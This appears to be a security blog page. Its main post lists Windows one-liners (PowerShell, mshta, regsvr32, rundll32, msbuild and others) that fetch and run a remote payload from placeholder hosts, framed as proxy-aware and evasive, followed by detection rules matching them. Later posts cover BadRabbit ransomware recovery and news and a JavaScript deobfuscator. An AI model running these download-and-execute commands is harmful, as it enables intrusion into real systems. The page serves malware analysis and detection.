How a malware can download a remote payload and execute malicious code…in one line?

This post on arno0x0x‘s blog is awesome: an accurate analysis of some ‘one-line commands’ that can be used on a Windows system in order to download a malicious payload and execute it.

The examples are written in several scripting languages; they work in memory with a minimal disk footprint and are “proxy aware”, so they can also be executed from inside a corporate network.

Priceless information for any malware analyst!

Prerequisites

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as many systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written on disk

Examples

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO

Cmd

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Msbuild

cmd /V/c"set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache
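As an added defender-side example (not from the original post or from arno0x0x's article), the following Python runs a few detection rules over constructed process-creation events that mirror the one-liners above: a PowerShell download cradle piped to iex, regsvr32 or mshta pulling a scriptlet from a URL, and a LOLBin loading its payload from a UNC (WebDAV) path. The rule names, the sample events and the (image, command line) format are assumptions.

```python
import re

# Constructed sample process-creation events (image, command line); they mirror
# the one-liners listed above and are not real telemetry. Last two are benign.
SAMPLE_EVENTS = [
    ("powershell.exe",
     "powershell -exec bypass -c \"(New-Object Net.WebClient).Proxy.Credentials="
     "[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex\""),
    ("regsvr32.exe", "regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"),
    ("mshta.exe", "mshta vbscript:Close(Execute(\"GetObject(\"\"script:http://webserver/payload.sct\"\")\"))"),
    ("rundll32.exe", r"rundll32 \\webdavserver\folder\payload.dll,entrypoint"),
    ("cscript.exe", r"cscript //E:jscript \\webdavserver\folder\payload.txt"),
    ("regasm.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll"),
    ("rundll32.exe", r"rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL"),  # benign
    ("powershell.exe", "powershell -c Get-Process"),                                 # benign
]

# Each rule: (name, image pattern, command-line pattern); all matched case-insensitively.
RULES = [
    # Web download primitive followed by in-memory execution via iex / Invoke-Expression.
    ("ps_download_cradle", r"powershell",
     r"(iwr|invoke-webrequest|net\.webclient|downloadstring).*(\|\s*iex\b|invoke-expression)"),
    # regsvr32 told to fetch its scriptlet (scrobj.dll) from a URL.
    ("regsvr32_remote_scriptlet", r"regsvr32", r"/i:\s*https?://"),
    # mshta given inline script or a remote script: moniker instead of a local .hta.
    ("mshta_inline_script", r"mshta", r"(vbscript|javascript):|script:https?://"),
    # Binaries that fetch their payload over WebDAV through a UNC path
    # (the network call is then made by svchost.exe, not by the binary itself).
    ("lolbin_unc_payload", r"(rundll32|cscript|wscript|regasm|regsvcs|msbuild|cmd)",
     r"\\\\[a-z0-9._-]+\\[^\s\"']+"),
]

def classify(image, cmdline):
    """Return the names of every rule the event matches (empty list = no hit)."""
    return [name for name, image_re, cmd_re in RULES
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmdline, re.I)]

def scan(events):
    """Run all rules over (image, cmdline) pairs; keep only the events that fired."""
    results = []
    for image, cmdline in events:
        hits = classify(image, cmdline)
        if hits:
            results.append((image, cmdline, hits))
    return results

if __name__ == "__main__":
    for image, cmdline, hits in scan(SAMPLE_EVENTS):
        print(f"{image:16} {', '.join(hits):26} {cmdline[:70]}")
```

The rules are deliberately narrow; in a real pipeline you would also correlate the parent process (Office or a browser spawning these binaries) and the WebDAV client cache writes noted above.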


For more information and examples, please refer to arno0x0x‘s article:

Windows oneliners to download remote payload and execute arbitrary code

How to recover files encrypted by BadRabbit ransomware?

Researchers at Kaspersky Lab have discovered that some victims may be able to recover their files without paying any ransom.

The discovery was made by Kaspersky's researchers, who analyzed the encryption functionality implemented by the ransomware: Bad Rabbit leverages the open source library DiskCryptor in order to encrypt the user's files, and its pre-boot screen allows victims who have received the decryption key to enter it and boot their system.

Kaspersky’s researchers discovered that, after the ransomware creates the decryption key, it is not wiped from memory.

The symmetric encryption keys are securely generated on the ransomware side which makes attempts to guess the keys unfeasible in practice.

However, we found a flaw in the code of dispci.exe:

the malware doesn’t wipe the generated password from the memory, which means that there is a slim chance to extract it before the dispci.exe process terminates.

Unfortunately, there is only a “slim chance” that victims will be able to extract the password.
However, Bad Rabbit does not delete shadow copies, allowing victims to restore their files through this Windows backup functionality:

We have discovered that Bad Rabbit does not delete shadow copies after encrypting the victim’s files. It means that if the shadow copies had been enabled prior to infection and if the full disk encryption did not occur for some reason, then the victim can restore the original versions of the encrypted files by the means of the standard Windows mechanism or 3rd-party utilities.


More information on securelist.com:

Bad Rabbit ransomware

BadRabbit ransomware: suggested readings

Spreads via network, currently hits Russia, Ukraine, Germany, Japan, and Turkey

A variant of Petya/NotPetya/EternalPetya called BadRabbit and probably prepared by the same authors has infected several big Russian media outlets.

BadRabbit uses SMB to propagate laterally with a hardcoded list of usernames and passwords.

However, unlike NotPetya, it doesn’t use EternalBlue.

Below are some suggested readings regarding this threat:


darkreading.com

A wave of ransomware infections is hitting hundreds of government, media, transportation, and other targets in Eastern Europe today mainly in Russia and Ukraine, but also in Bulgaria, Germany, and Turkey.

Among the most high-profile targets thus far are major news outlets such as Russia’s Interfax Agency, and Ukraine’s Kiev Metro, its Odessa International Airport, and ministries of infrastructure and finance.

https://www.darkreading.com/attacks-breaches/bad-rabbit-ransomware-attacks-rock-russia-ukraine—and-beyond/d/d-id/1330208


us-cert.gov

US-CERT discourages individuals and organizations from paying the ransom, as this does not guarantee that access will be restored. Using unpatched and unsupported software may increase the risk of proliferation of cybersecurity threats, such as ransomware.


welivesecurity.com

ESET discovered that in the case of the Kiev Metro, the malware used for the cyberattack was Diskcoder.D, a new variant of ransomware known also as Petya.

infosecurity-magazine.com

BadRabbit was first spotted attacking Russian media outlets on Tuesday, including the news agency Interfax, according to security firm Group-IB, which posted a screenshot of the ransom screen. Other security firms have followed with their own early research and detections, with the consensus being that the malware is a variant of the Petya ransomware.

https://twitter.com/GroupIB_GIB/status/922819835494649856/photo/1

The attackers are demanding 0.05 bitcoin as ransom — or about $280 at the going exchange rate.


kaspersky.com

According to our findings, the attack doesn’t use exploits. It is a drive-by attack: Victims download a fake Adobe Flash installer from infected websites and manually launch the .exe file, thus infecting themselves.


malwarebytes.com

Countries we know to be impacted so far are Russia, Ukraine, Turkey, Bulgaria, and Germany, with attacks centered on targets as wide-ranging as infrastructure, transportation, and media outlets.

The dropper is an executable that pretends to be a Flash update. The malware must run with Administration privileges, but no UAC bypass technique has been deployed — it relies purely on social engineering, trying to convince the user to elevate it.


nakedsecurity.sophos.com

If Bad Rabbit infects your computer, it attempts to spread across the network using a list of usernames and passwords buried inside the malware.

These credentials include passwords straight out of a worst passwords list.


isc.sans.edu

It seems to be delivered via malicious URL as fake flash update:

1dnscontrol[.]com/flash_install.php


bloomberg.com

Russian business newswire Interfax suffered a hacker attack that made part of its services unavailable to subscribers, according to a statement Tuesday.


soursefrontnews.eu

The virus like Petya.A, which hit computers around the world in late June, today, October 24, infected computers of the Kyiv Metro, a source told Front News International.


securityaffairs.co

A new massive ransomware campaign is rapidly spreading around Europe, the malware dubbed Bad Rabbit has already affected over 200 major organizations mainly in Russia, Ukraine, Germany, Japan, and Turkey in a few hours.


securityweek.com

Infected computers display a screen informing users that their files have been encrypted and instructing them to access a website over the Tor anonymity network.

The Tor site tells victims to pay 0.05 bitcoin, worth roughly $283, to obtain the key needed to recover the encrypted files.


thehackernews.com

Bad Rabbit ransomware uses DiskCryptor, an open source full drive encryption software, to encrypt files on infected computers with RSA 2048 keys.


threatpost.com

The infpub.dat file prominent in today’s attack will also install another malicious executable called dispci.exe.

It creates tasks in the registry to launch the executable; the tasks are named after the dragons in Game of Thrones: Viserion, Drogon and Rhaegal.

There’s also a reference to a Game of Thrones character GrayWorm in the code.


trendmicro.com

Initial reports peg the main casualties as transport systems and media outlets in Ukraine and Russia. The Ukrainian arm of CERT (CERT-UA) has also issued an advisory warning of further potential ransomware attacks.


IlluminateJs: a good JavaScript Deobfuscator

Useful during analysis of malicious sites

Yesterday in my Twitter stream I’ve seen this tweet by Florian Roth:

During the analysis of a malicious site, one of the first steps is the deobfuscation of the suspicious JavaScript.

There are a lot of tools (online or standalone) that can help the analyst during this step, but IlluminateJs, from my point of view, is one of the most complete and accurate.

Consider it like JSDetox, but on steroids.

The IlluminateJs core is a Babel compiler plugin, and it works entirely in your browser: no server interaction is needed to perform the deobfuscation.

Features

  • Extended constant propagation
  • Array mutators tracking
  • Mixed-type expressions evaluation
  • Supports modern JavaScript (ES6)
  • Function calls evaluation
  • Built-in function evaluation
  • Loops evaluation
  • Procedure inlining

References

https://illuminatejs.com